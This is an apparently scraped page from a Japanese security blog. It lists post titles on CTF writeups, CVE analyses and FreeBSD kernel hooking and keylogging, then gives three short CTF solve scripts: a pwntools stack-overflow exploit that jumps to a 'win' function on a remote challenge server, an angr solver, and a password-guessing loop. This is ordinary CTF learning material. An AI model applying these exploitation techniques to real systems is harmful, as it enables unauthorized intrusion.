*Posts*

Linuxにおける環境変数

WaniCTF2024-Writeup

IDについて

SECCON-Beginners-CTF-2024-作問者Writeup

2023年を振り返る

Linuxにおけるreboot

SECCON-2023-Capsule-CTF-Writeup

r2pipe101

sedbf

俺とbrainf*ck

yaraのdaemonを開発中です

FreeBSD-Process

The-Cyber-Cooperative-CTF-Writeup

Postpone-Bot

peda-+-cxxfilt

昔Rustで作ったシェルを読む

MCCAP

セキュリティキャンプ全国大会2023-Z2:-振り返り

Sort-String

Discordに貼られたTwitterのリンクをOGP付きのものに書き換えるBotを作った

Clamd-client

Clamd-Protocol

Linux-process-hiding

n7m

Flatt-Security-Speedrun-CTF#2-writeup

NewportBlakeCTF-2023-Web-Writeup

ClamAVのシグネチャをヒューマンリーダブルな形にパースしたい-part1

Dockerを"使える"人がcolimaで困らないために

Countermeasures-for-Prompt-Injection

Rubyのsyntaxと脳内パーサ

BlackHat-MEA-Qualification-CTF-Writeup

SECCON-Beginners-CTF-2023-作問者Writeup

WaniCTF-2023-writeup

CLIでChatGPTと会話する

GMOペパボに入社しました

r2GPT

r2stelftools

2022年を振り返る

chromoly

MBSD-Cybersecurity-Challenges-2022-参加記

taskctf22-writeup

花金

UECTF2022-writeup

SECCON-Beginners-CTF-2022-作問者Writeup

IPFactory-WelcomeCTF-2022-開催記&作問者writeup

TSG-LIVE!-8-CTF-writeup

b01lers-CTF-2022-writeup

pRETzel-logic

UMDCTF-2022-writeup

GMOペパボの冬期インターンに参加してきました

I-don't-undarstand-LLVM

クリスマスなのでポートスキャナを実装しようかと思ったら昔の俺が既に実装していた

Terraformers-~他人のマシンに隠れて住み着くゴキブリ共~

Rust-In-Linux-Kernel-2

taskctf21-writeup

3の倍数でアホになるコンパイラ

Detecting-fileless-execution-in-Linux

Linux-Detect-Virtualization

Docker-image-injection

CVE-2021-41773-path-traversal-in-Apache-httpd-2.4.49

dev

NITIC-CTF2-writeup

setodaNote-CTF-writeup

Linux-(anti)+-debugging

disabling-CET

TableGen-Programmer's-Reference

r4ge-against-the-radare2

n01e0を起こす技術

SECCON-Beginners-CTF-2021-作問者Writeup

IPFactory-WelcomeCTF-2021-開催記

足跡

ROPOB

Rust-In-Linux-Kernel

シン・エヴァンゲリオンを観ました

ThinkPad-X1-Nanoを購入した

readfile(2)で作成したcatのはやさ

catコマンドをつくってみる

Simple-SAT-Solver-by-Rust

CVE-2018-18397-mishandles-access-control-in-userfaultfd

セキュリティキャンプ全国大会2020Z-V:-まとめ

userfaultfdについてのメモ

Linuxカーネルにコミットするまでの流れ

セキュリティキャンプ全国大会2020Z-V:-第二回ハッカソン

FreeBSD-list

険C

FreeBSD-hooking-communication-protocols

FreeBSD-keylogging

セキュリティキャンプ全国大会2020Z-V:-第一回ハッカソン

FreeBSD-hooking-syscall

FreeBSD-character-device-module

FreeBSD-syscall-module

FreeBSD-loadable-kernel-modules

ISCCTF2020作問者writeup

セキュリティキャンプ全国大会:-第一回ミーティング

セキュリティキャンプ2020全国大会:-追加受講

学内で初心者向けのPwnについての講義を開催した

CVE-2020-14385-xfs-DoS

セキュリティキャンプ2020全国大会に参加できることになった

筋トレの進捗管理をGitでやる

CVE-2020-14001-kramdown-rce

ARIA

Let's_start_KUnit!

systemd-nspawnことはじめ

List-in-Linux-kernel

Let's-note-(CF-SV7)のメインボードへのアクセス

from pwn import *
binfile = 'chall'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('chall.live.ctf.tsg.ne.jp', 30006)

pad = b'a' * 0x28

payload = pad + pack(e.sym['win'])

io.sendline(payload)

io.interactive()

import angr
import logging

logging.getLogger("angr").setLevel("CRITICAL")
angr.manager.l.setLevel("CRITICAL")
proj = angr.Project("dns_ropob")

simgr = proj.factory.simgr()
simgr.explore(find=lambda s: b"correct!" in s.posix.dumps(1), avoid=lambda s: b"wrong!" in s.posix.dumps(1))
if len(simgr.found) > 0:
    print(simgr.found[0].posix.dumps(0).decode("utf-8", "ignore"))
    exit(0)
else:
	print('not found')

#!/usr/bin/env python3
from pwn import *
import subprocess
binfile = 'guess'
context.log_level = 'critical'
e = ELF(binfile)
context.binary = binfile
io = remote('chall.live.ctf.tsg.ne.jp', 21234)

pw = subprocess.run("pwgen 50000 -s -1 -N1|tail -c 20", shell=True, stdout=subprocess.PIPE).stdout

io.sendlineafter(b':', pw)

while True:
    print(io.readline().decode(), end='')
    print(io.readline().decode(), end='')
    io.sendline(pw)